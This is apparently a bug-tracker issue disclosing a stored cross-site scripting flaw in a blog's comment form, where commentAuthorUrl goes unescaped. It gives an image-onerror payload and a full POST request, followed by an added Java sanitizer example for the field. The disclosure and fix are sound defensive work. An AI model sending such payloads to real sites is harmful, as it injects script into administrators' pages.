There is another stored XSS vulnerability #127

Closed
@Artemis1029

Description

I confirm that I have reviewed (mark [ ] as [x])


I am requesting (mark [ ] as [x])

  • Bug report
  • Add a new feature or functionality
  • Request technical support

Bug Report

I found that you apply HtmlUtil.escape to CommentContent
but do nothing with CommentAuthorUrl.

payload: commentAuthorUrl="><img src=1 onerror=alert(123)>

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28

In URI /admin/comments?status=1
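
The gap reported above, where the comment content is escaped but commentAuthorUrl is not, can be closed by validating and escaping the URL field before it is stored or rendered. The following is an added example, not the project's own code: CommentUrlSanitizer, escapeHtml and sanitizeAuthorUrl are hypothetical names, escapeHtml stands in for the HtmlUtil.escape call the issue mentions, and the http/https restriction goes beyond what the issue asks for.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Optional;

// Hypothetical helper (not part of the project) for the commentAuthorUrl field.
public class CommentUrlSanitizer {

    // Minimal HTML escaper, a stand-in for HtmlUtil.escape.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Accept only absolute http/https URLs with a host, then escape for attribute use.
    static Optional<String> sanitizeAuthorUrl(String raw) {
        if (raw == null || raw.trim().isEmpty()) return Optional.empty();
        try {
            URI uri = new URI(raw.trim());
            String scheme = uri.getScheme();
            if (scheme == null || uri.getHost() == null) return Optional.empty();
            boolean web = scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https");
            return web ? Optional.of(escapeHtml(uri.toASCIIString())) : Optional.empty();
        } catch (URISyntaxException e) {
            // Quotes, angle brackets and spaces are illegal in a URI, so the value is dropped.
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        String reported = "\"><img src=1 onerror=alert(123)>233"; // decoded value from the request in the issue
        String benign = "https://example.com/?a=1&b=2";           // constructed sample
        System.out.println("reported -> " + sanitizeAuthorUrl(reported));
        System.out.println("benign   -> " + sanitizeAuthorUrl(benign));
        // Rendering the author link in the admin comment list once the value is safe:
        sanitizeAuthorUrl(benign).ifPresent(u ->
            System.out.println("<a href=\"" + u + "\" rel=\"nofollow\">author</a>"));
    }
}
```

The same treatment applies to commentAuthor and commentAuthorEmail, which the request in the issue also sends as free text.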

Labels: kind/bug (Categorizes issue or PR as related to a bug.), vulnerability (Vulnerability)